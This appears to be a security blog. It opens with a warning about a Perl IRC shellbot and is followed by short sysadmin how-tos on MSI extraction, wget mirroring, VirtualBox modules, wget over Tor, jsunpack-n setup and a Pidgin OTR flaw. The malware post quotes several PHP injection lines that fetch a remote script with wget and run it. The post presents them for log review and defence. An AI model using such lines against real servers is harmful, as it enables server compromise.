“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You maybe saw strange input in server logs…

Something like:

<?php system(“wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

or

<?php system(“wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz”); ?>

 

What does that mean? Well, first of all, Your server potentially vulnerable to the  PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes, that run from /tmp/ folder and with default Apache user.  If there are – You’ve been infected. Take care of it

Now, how exactly this stuff looks like?

Header:

 

header

VT sample, in case You curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s IRC Server-oriented bot, with the main capability to SPAM. Language looks like Portuguese- Brazilian?

It also seen in wild since 2012, at least, Google said 🙂 But older versions had less functionality. And now it back 🙂

That’s how it behave:

1. Script connect to IRC server, protected with credentials [unfortunately, it not available now]

2. Fetch list of the mails, names and addresses for replies from embedded URLs, compose the mail messages and send them in behalf of Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and  execution

And, since fun is everything in the malware hunting:

One of functions:

func

🙂 he\she is so exited 🙂

It’s not new player on this game field, but recently he\she back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe

D.L.

Tags :       

Extract MSI in Linux\Windows

2012.08.05

If You have MSI file, its some sort of archive\, that Microsoft Installer use to pack installation files.
to analyze it, You need to extract them
Under Windows, in command line You run:
msiexec /a PathToSourseMSI /qb TARGETDIR=DirectoryToStoreExtractedFiles

Under *nix systems
1. rename file.msi to file.msi.zip
2. Extract as regular zip or  use 7zip unpacker.

Tags :     

Local copy of Directory Listing with wget

2012.07.26

Well, sometime You need to get local copy (or not local:) ) of some folders with Directory Listing enabled. It usually looks like basic webpage with “Index of …” at title

wget for each folder that mirrored, create multiple file copies of dynamically created Index page:

index.html 
index.html?C=D;O=A 
index.html?C=D;O=D 
index.html?C=M;O=A 
index.html?C=M;O=D 
index.html?C=N;O=A 
etc... 

Annoying, a lot of useless request to server (that already overloaded by Your good will) and not nice for eye to watch Your local copy.
Don't found simple solution on Google, so here is mine:

 wget -r -p -np -e robots=off -U mozilla -R index.html* http://website/file_archive/ 

Explanation: 
-r - recursive 
-p - get all 
-np - don’t ascend to the parent directory 
-e robots=off - don't care about what robots.txt say
-U mozilla - I am Mozilla! :))
-R index.html* - reject files index.html* (dangerous if files in subfolder include index.html files, but I am talking about archives)
Have fun and try to respect those whom sites You dump.

Tags :     

VirtualBox & VMware on linux error – no source

2012.06.24

Well, sometimes things just stop working.

VirtualBox – error about modules not running + require to run as root:

 /etc/init.d/vboxdrv setup 

Well, Google will at 99% of places  recommend You to 

# yum install gcc kernel-devel kernel-headers

And it is help... But if not? 
Then it recommended to define KERNEL_DIR=
Well. sometimes it helps too, but what if not?

Well, let's cut here...
Here what I found as additional problem on RHEL & CentOS (& Fedora)
Nothing help? 

$ uname -a

Do Your kernel have .PAE ?
If Yes - then under root:

# yum install kernel-PAE-devel

and then

# /etc/init.d/vboxdrv setup 
Done.
Tags :     

wget thru tor network – how to? Easy!

2012.06.05

Looks like common task – run wget via tor. No? Just me?
Apparently, when You google it, it send You to forums, man pages, or whatever workarounds possible, because wget don’t support SOCKS proxy natively, and Tor is not HTTP\HTTPS proxy.
As a matter of fact, it’s easy 🙂
We’ll need tor and proxychains to accomplish our goal

1. Add Tor repository if You not done this yet:

https://www.torproject.org/docs/rpms.html.en

2. Then install tor and proxychains
$ sudo yum install tor proxychains

3. Start tor service
$ sudo service tor start

4. Check that proxychains config contain proper string for folowing data to Tor network
$ sudo nano /etc/proxychains.conf
in the bottom verify that line is present, if not – add it.
socks4  127.0.0.1 9050

5. test the config:
$ proxychains wget http://whoer.net/extended

and open extended page in any html viewer, check what IP logged. 🙂
Working.

Tags :     

Install jsunpack-n on Fedora\RHEL

2012.05.22

Suddenly, one day jsunpack.jeek.org became unavailable due some internal error, and I had few samples to decrypt.
So – Google found for me jsunpack-n project

Well, nice one, but as usual, installation instructions ported for Ubuntu (mainstream 🙂 )

Here is small guide for those who will need to use this awesome tool under Fedora\RHEL or even CentOS (not tested, update me if You did)

After You got all files in jsunpack-n folder, go and open INSTALL file, written by Blake Hartstein. I will  refer to this INSTALL file each time we can proceed with original install instructions.

1. Let’s install all packets required for successful compilation

# yum install libpcap-devel pkgconfig python-devel gtk2-devel libnet-devel  pcre-devel pcre gcc-c++ gcc

2. Good. Now we need to install libnids-1.24 (or – at least CONFIGURE and MAKE it) from folder  depends/pynids-0.6.1/libnids-1.24

$ cd depends/pynids-0.6.1/libnids-1.24

$ ./configure

$ make

# make install

p.s. If You will install libnids from Your repositories, pynids-0.6.1 will fail to setup itself – error:

gcc: error: libnids-1.24/src/libnids.a: No such file or directory

3. Install dependencies, as mentioned in INSTALL file, one by one.

4. Try to run

$ python jsunpackn.py  -u http://google.com

5. see result in temp/files

Known issues:

1. Yara error

In case You got message ImportError: libyara.so.0: when run jsunpackn.py, run the following commands:

# echo “/usr/local/lib” >> /etc/ld.so.conf
# ldconfig

2. ZLW error

In case You have error: ImportError: No module named lzw when run jsunpackn.py:

Go to website http://pypi.python.org/pypi/lzw/

Download, unpack and perform install of LZW  package:

$ cd lzw-0.01.11/
$ python setup.py build
# python setup.py install

Cheers!

Pidgin & OTR DBUS vuln – plain text access to messages

2012.02.25

Today Dimitris Glynos released bug that affect my favorite IM client Pidgin with OTR plugin.
It require user-level access for attacker to listen to DBUS messaging of victim.

Interesting fact is that vuln was reported about 2 month ago to development team, and no update since…

Is it mean that Pidgin development finished?

upd1: You can try to reinstall pidgin from tar with   --disable-dbus option in ./configure script, or wait for solution from developer.

 

Tags :